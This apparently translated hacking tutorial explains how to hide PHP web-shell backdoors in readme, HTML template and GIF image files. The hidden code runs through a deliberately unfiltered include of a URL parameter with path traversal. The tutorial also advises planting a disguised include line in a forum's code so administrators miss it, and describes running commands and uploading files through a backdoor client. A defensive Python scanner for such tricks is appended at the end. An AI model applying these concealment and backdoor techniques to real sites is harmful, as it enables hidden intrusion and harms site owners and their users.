Recently, many of my friends have asked me whether I can hide my Trojan horse in HTML files or images. I have inserted a Trojan horse into a PHP file; as for putting it in an HTML file or image, let's take a look at this test report.
You need to know that a PHP statement placed in an image cannot be executed on its own, because PHP only parses files with the .php extension. Therefore, for PHP statements hidden in an image to be executed, they have to be pulled in through PHP functions such as include and require.
You may remember the articles from a few days ago about hiding Trojans in pictures. That is, use the include("x.gif") statement in a PHP file to call the Trojan statement hidden in the image. The statements in ASP are similar. It seems well hidden, but it easily arouses the suspicion of anyone who knows a little PHP. Because it is difficult to pass parameters through the GET method in the URL, the inserted Trojan cannot show its capabilities.
The include function is used very frequently in PHP, so it gives rise to many security issues. For example, the PHPWIND 1.36 vulnerability is caused by not filtering the variable after include. Therefore, we can construct a similar statement and insert it into a PHP file. Then the Trojan horse can be hidden in an image or HTML file, which makes it better hidden. For example, insert the following statement in the PHPWIND forum:
<? @include 'includ/' . $PHPWIND_ROOT; ?>
Generally, it cannot be seen by administrators.
With the include function, we can hide the PHP Trojan in many types of files, such as txt, html, and image files. Since txt, html, and image files are the most common in forums and document systems, we will test them in sequence.
First, create a PHP file test.php with the following content:
<?php
// The "test" query parameter is used unfiltered as part of the include path.
$test = $_GET['test'];
@include 'test/' . $test;
?>
Txt files are usually readme files, so we can put a Trojan in the readme file of a directory. Create a txt file t.txt and paste the scripts into it. Then visit hxxp://localhost/test.php?test=../t.txt. If you see the content of t.txt, it is working. Then, in lanker's mini PHP backdoor client, enter hxxp://localhost/test.php?test=../t.txt as the Trojan address and cmd as the password, and you can see all the results returned by the commands you run.
HTML files are generally template files. So that the Trojan inserted into the HTML file can be called and executed without being displayed, we can add a text box with the hidden attribute to the HTML, for example, and then use the same method as above. The returned results can generally be seen by viewing the page source. For example, use the function that shows the program directory and then view the source: the directory C:\Uniserver2_7s\www\test is displayed.
Next, let's talk about image files. The most insidious way is to hide Trojans in images. We can edit an image directly and insert the statement at the end of the image.
In testing, the image is generally not affected. Add the client Trojan address in the same way.
We can see that the result returned when viewing the PHP environment variables is the original image.
There may be some gap between this and the expected results. The command has actually been run, but the returned results are not visible: because this is a real GIF file, the returned results are not displayed. To verify whether the command is actually executed, we perform the file upload command. As expected, the file has been successfully uploaded to the server. The advantage of this disguise is that it hides well. The drawback goes without saying. If you want to see the returned results, create a fake image file with Notepad.
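A defensive check for the technique described above, added here as an example and not part of the original article: it flags PHP open tags inside txt, html and image files, and include/require calls in .php files whose argument contains a variable, as in test.php. The function names, regexes and sample files are assumptions constructed for illustration, and the matches are heuristics meant for triage.

```python
import os
import re

# Carrier types the article tests; PHP does not parse these on its own.
CARRIER_EXTS = (".txt", ".html", ".htm", ".gif", ".jpg", ".jpeg", ".png")

# "<?php", "<?=", or a short tag "<?" followed by whitespace or "@".
# "<?xml" is not matched. Heuristic: random binary data can occasionally collide.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|[\s@])", re.I)

# include/require (and *_once) whose argument on the same line holds a variable.
DYNAMIC_INCLUDE = re.compile(rb"\b(?:include|require)(?:_once)?\b[^;\n]*\$\w+", re.I)

def scan_file(name, data):
    """Return [(finding, byte_offset), ...] for one file name and its bytes."""
    lower = name.lower()
    if lower.endswith(CARRIER_EXTS):
        m = PHP_OPEN_TAG.search(data)
        return [("php-in-carrier", m.start())] if m else []
    if lower.endswith(".php"):
        return [("dynamic-include", m.start())
                for m in DYNAMIC_INCLUDE.finditer(data)]
    return []

def scan_tree(root):
    """Walk a web root and return {path: findings} for files with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                found = scan_file(fname, fh.read())
            if found:
                report[path] = found
    return report

# Constructed samples (not taken from a real site); payloads are placeholders.
SAMPLES = {
    "logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    "banner.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;<?php /* placeholder */ ?>",
    "readme.txt": b"Install notes\n<? /* placeholder */ ?>\n",
    "page.html": b'<?xml version="1.0"?><html></html>',
    "test.php": b"<?php\n$test = $_GET['test'];\n@include 'test/' . $test;\n?>",
    "index.php": b"<?php include 'header.php'; ?>",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, scan_file(name, data))
```

Run scan_tree() over the web root and upload directories; a hit in a carrier file only becomes executable when some .php file includes it, so the dynamic-include findings are the ones to fix first.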